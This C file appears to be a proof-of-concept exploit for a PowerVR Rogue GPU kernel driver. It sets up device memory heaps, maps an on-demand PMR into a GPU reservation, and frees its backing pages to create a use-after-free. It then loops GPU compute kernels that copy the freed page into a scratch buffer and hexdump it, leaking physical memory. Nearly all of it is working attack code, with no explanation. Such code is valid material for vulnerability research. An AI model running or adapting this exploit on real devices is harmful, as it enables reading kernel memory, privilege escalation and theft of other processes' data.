#define PVR_ROGUE_PDSINST_OPCODEC_CMP UINT32_C(0x0000000b)
#define PVR_ROGUE_PDSINST_CMPI_IM16_SHIFT (2U)
#define PVR_ROGUE_PDSINST_CMPI_SRC0_SHIFT (18U)
#define PVR_ROGUE_PDSINST_CMPI_IM_SHIFT (23U)
#define PVR_ROGUE_PDSINST_CMPI_SETCP_SHIFT (24U)
#define INSN_CMP_IMM_EQUAL(reg, imm) (                       \
  (PVR_ROGUE_PDSINST_OPCODEC_CMP << PVR_TYPE_OPCODE_SHIFT) | \
  ((imm) << PVR_ROGUE_PDSINST_CMPI_IM16_SHIFT) |             \
  ((reg) << PVR_ROGUE_PDSINST_CMPI_SRC0_SHIFT) |             \
  (1 << PVR_ROGUE_PDSINST_CMPI_IM_SHIFT) |                   \
  (1 << PVR_ROGUE_PDSINST_CMPI_SETCP_SHIFT)                  \
)

void consume_fence(int fence_fd) {
  struct pollfd pollfds[] = { { .fd = fence_fd, .events = POLLIN } };
  int poll_res = SYSCHK(poll(pollfds, sizeof(pollfds)/sizeof(pollfds[0]), -1));
  close(fence_fd);
}

void generate_pds_copy16_kernel(void *code_and_data_page, uint64_t copy_dest, uint64_t copy_src) {
  assert((copy_src % 16) == 0);
  assert(copy_dest % 4 == 0);

  memset(code_and_data_page, '\0', 0x1000);

  size_t insn_idx = 0;
  uint32_t *insn = code_and_data_page;
  uint64_t *cons = (void*)(((uint8_t*)code_and_data_page) + 0x800);
  uint64_t *con = cons;


  /* load from source into first 4 temps */
  *(insn++) = INSN_LD(con-cons);
  *(con++) = copy_src | (/*num_dwords*/(uint64_t)4 << 40) | PVR_ROGUE_PDSINST_LD_LD_SRC0_CMODE_BYPASS | PVR_ROGUE_PDSINST_LD_LD_SRC0_SLCMODE_BYPASS;

  /* wait for preceding LDs */
  *(insn++) = INSN_WDF();

  /* store to destination */
  *(insn++) = INSN_ST(con-cons); /* store from temp to memory */
  *(con++) = copy_dest | (/*num_dwords*/(uint64_t)4 << 40) | PVR_ROGUE_PDSINST_ST_ST_SRC0_CMODE_WRITE_THROUGH | PVR_ROGUE_PDSINST_ST_ST_SRC0_SLCMODE_WRITE_THROUGH;

  /* wait for preceding ST */
  *(insn++) = INSN_WDF();

  /* end */
  *(insn++) = INSN_HALT();

  assert((char*)insn - (char*)code_and_data_page <= 0x800);
  assert((char*)con - (char*)cons <= 127*16);
}

static void generate_simple_pds_command(uint32_t *cdm_commands_map, uint64_t code_and_data_pages_pdsaddr) {
  uint32_t *cdm_commands_map_orig = cdm_commands_map;

  *(cdm_commands_map++) = (0U << 30) | 2 | (127<<2) | (0xfU<<8); // KERNEL0, pds_data_size=127*16=2032, pds_temp_size=max
  *(cdm_commands_map++) = (code_and_data_pages_pdsaddr + 0x800) | (1U<<2); // pds_res + 0x800
  *(cdm_commands_map++) = (code_and_data_pages_pdsaddr); // pds_res
  *(cdm_commands_map++) = 1; // x
  *(cdm_commands_map++) = 1; // y
  *(cdm_commands_map++) = 1; // z
  *(cdm_commands_map++) = (1U<<27); // KERNEL8

  *(cdm_commands_map++) = 2U << 30; // STREAM_TERMINATE
  assert(cdm_commands_map < cdm_commands_map_orig + 0x10000);
}






/* =====================   MAIN   ===================== */
IMG_HANDLE heap_general;
IMG_HANDLE heap_general_carveout_res;
IMG_HANDLE heap_general_carveout_pmr;

IMG_HANDLE heap_pds;
IMG_HANDLE heap_pds_carveout_res;
IMG_HANDLE heap_pds_carveout_pmr;

IMG_HANDLE hPrivData;
IMG_HANDLE hComputeContext;

#define GPUADDR_UAF_PAGE        0x8055550000
#define GPUADDR_COPY_SCRATCH    0x80dddd0000
#define CDM_COMMANDS_ADDR       0x80c0de0000

static int send_compute_command(IMG_HANDLE hComputeContext, int tl_fd) {
  struct rogue_fwif_cmd_compute compute_cmd = {
    .tpu_border_colour_table = 0xaa0000 >> 2,
    .cdm_cb_maybe = CDM_COMMANDS_ADDR, // ACCESSED!
    .cdm_context_state_base_addr_maybe = 0xcc0000,
    .tpu_maybe = 0x21,
    .cdm_resume_pds1_maybe = (0/*0x0090080a*/), // TODO
    .some_flags_maybe = 0/*0x100*/, // TODO
  };
  {
    PVRSRV_BRIDGE_IN_RGXKICKCDM2 in = {
      .ui64DeadlineInus = (uint64_t)1000*1000,
      .hComputeContext = hComputeContext,
      .pui8DMCmd = (char*)&compute_cmd,
      .ui32CmdSize = sizeof(compute_cmd),
      .puiUpdateFenceName = "mycdmfence",
      .hCheckFenceFd = -1,
      .hUpdateTimeline = tl_fd /*-1*/,
      .ui32NumOfWorkgroups = 0,
      .ui32NumOfWorkitems = 0
    };
    PVRSRV_BRIDGE_OUT_RGXKICKCDM2 out;
    do_driver_cmd(PVRSRV_BRIDGE_RGXCMP, PVRSRV_BRIDGE_RGXCMP_RGXKICKCDM2);
    return out.hUpdateFence;
  }
}

int main(void) {
  setbuf(stdout, NULL);
  pin_to(2);
  printf("PID=%d\n", getpid());
  gpu_fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
  srvkm_init(gpu_fd, PVR_SRVKM_SERVICES_INIT);
  IMG_HANDLE ctx = create_device_memory_context(&hPrivData);

  heap_general = create_heap(ctx, 0x8000000000, 0x2000000000, 12);
  heap_general_carveout_res = create_reservation(heap_general, 0x8000000000, 0x10000);
  heap_general_carveout_pmr = alloc_pmr_uncached(0x10000);
  map_pmr(heap_general, heap_general_carveout_pmr, heap_general_carveout_res);

  heap_pds = create_heap(ctx, 0xDA00000000, 0x0100000000, 12);
  heap_pds_carveout_res = create_reservation(heap_pds, 0xDA00000000, /*0x10000*/0x800000);
  heap_pds_carveout_pmr = alloc_pmr_uncached(/*0x10000*/0x800000);
  map_pmr(heap_pds, heap_pds_carveout_pmr, heap_pds_carveout_res);
  uint32_t *heap_pds_carveout_pmr_map = mmap(NULL, 0x10000, PROT_READ|PROT_WRITE, MAP_SHARED, gpu_fd, (uint64_t)heap_pds_carveout_pmr<<12);

  IMG_HANDLE heap_usc = create_heap(ctx, 0xE000000000, 0x0100000000, 12);
  IMG_HANDLE heap_usc_carveout_res = create_reservation(heap_usc, 0xE000000000, 0x10000);
  IMG_HANDLE heap_usc_carveout_pmr = alloc_pmr_uncached(0x10000);
  map_pmr(heap_usc, heap_usc_carveout_pmr, heap_usc_carveout_res);

  IMG_HANDLE cdm_commands_res = create_reservation_ro(heap_general, CDM_COMMANDS_ADDR, 0x10000);
  IMG_HANDLE cdm_commands_pmr = alloc_pmr_uncached(0x10000);
  map_pmr(heap_general, cdm_commands_pmr, cdm_commands_res);
  uint32_t *cdm_commands_map = mmap(NULL, 0x10000, PROT_READ|PROT_WRITE, MAP_SHARED, gpu_fd, (uint64_t)cdm_commands_pmr<<12);

  IMG_HANDLE pds_res = create_reservation_ro(heap_pds, 0xDAD0000000, 0x100000);
  IMG_HANDLE pds_pmr = alloc_pmr_uncached(0x100000);
  map_pmr(heap_pds, pds_pmr, pds_res);
  uint32_t *pds_map = mmap(NULL, 0x100000, PROT_READ|PROT_WRITE, MAP_SHARED, gpu_fd, (uint64_t)pds_pmr<<12);

  IMG_HANDLE scratch_res = create_reservation(heap_general, GPUADDR_COPY_SCRATCH, 0x1000);
  IMG_HANDLE scratch_pmr = alloc_pmr_uncached(0x1000);
  map_pmr(heap_general, scratch_pmr, scratch_res);
  unsigned char *scratch_map = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, gpu_fd, (uint64_t)scratch_pmr<<12);
  volatile uint64_t *scratch_map_u64v = (volatile uint64_t *)scratch_map;

  IMG_HANDLE uaf_res = create_reservation_x(heap_general, GPUADDR_UAF_PAGE, 0x1000);
  // Create a PMR with PVRSRV_MEMALLOCFLAG_NO_OSPAGES_ON_ALLOC, so it will
  // allocate/free its backing pages on demand.
  IMG_HANDLE uaf_pmr = alloc_pmr(0x1000, PVRSRV_MEMALLOCFLAG_CPU_CACHE_INCOHERENT|PVRSRV_MEMALLOCFLAG_GPU_UNCACHED|PVRSRV_MEMALLOCFLAG_NO_OSPAGES_ON_ALLOC, false, 12);
#ifndef CRASH_INSTEAD_OF_UAF
  // Populate the PMR's backing pages.
  unsigned char *uaf_pmr_map = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, gpu_fd, (uint64_t)uaf_pmr<<12));
#endif
  // Map the PMR.
  {
    PVRSRV_BRIDGE_IN_DEVMEMXINTMAPPAGES in = {
      .hPMR = uaf_pmr,
      .hReservation = uaf_res,
      .ui32PageCount = 1,
      .uiFlags = 3/*RW*/
    };
    PVRSRV_BRIDGE_OUT_DEVMEMXINTMAPPAGES out;
    do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMXINTMAPPAGES);
  }
#ifndef CRASH_INSTEAD_OF_UAF
  // Release the PMR's backing pages.
  SYSCHK(munmap(uaf_pmr_map, 0x1000));
#endif

  struct rogue_fwif_cdm_regs_cswitch cswitch_regs = {
    .cdm_context_pds0  = 0x0000aaaa0000bbbb,
    .cdm_terminate_pds = 0/*0x0000cccc0000dddd*/,
    .cdm_resume_pds0   = 0x0000eeee0000ffff,
    .cdm_resume_pds0_b = 0x0001aaaa0001bbbb,
  };
  {
    PVRSRV_BRIDGE_IN_RGXCREATECOMPUTECONTEXT in = {
      .ui64RobustnessAddress = 0,
      .hPrivData = hPrivData,
      /* no reset command */
      .pui8FrameworkCmd = NULL,
      .ui32FrameworkCmdize = 0,

      .pui8StaticComputeContextState = (void*)&cswitch_regs,
      .ui32StaticComputeContextStateSize = sizeof(cswitch_regs),
      .ui32ContextFlags = 1/*RGX_CONTEXT_FLAG_DISABLESLR*/,
      .ui32MaxDeadlineMS = UINT_MAX,
      .ui32PackedCCBSizeU88 = 0,
      .ui32Priority = 2/*RGX_CONTEXT_PRIORITY_HIGH*/,
    };
    PVRSRV_BRIDGE_OUT_RGXCREATECOMPUTECONTEXT out;
    do_driver_cmd(PVRSRV_BRIDGE_RGXCMP, PVRSRV_BRIDGE_RGXCMP_RGXCREATECOMPUTECONTEXT);
    hComputeContext = out.hComputeContext;
  }

  int tl_fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
  srvkm_init(tl_fd, PVR_SRVKM_SYNC_INIT);

  while (1) {
    for (unsigned int off = 0; off < 0x1000; off += 16) {
      generate_simple_pds_command((void*)cdm_commands_map, 0xDAD0000000);
      generate_pds_copy16_kernel((void*)pds_map, GPUADDR_COPY_SCRATCH+off, GPUADDR_UAF_PAGE+off);
      int fence_fd = send_compute_command(hComputeContext, tl_fd);
      consume_fence(fence_fd);
      usleep(30*1000);
    }
    hexdump(scratch_map, 0x1000);
    sleep(1);
  }

  printf("\nDONE\n");
}
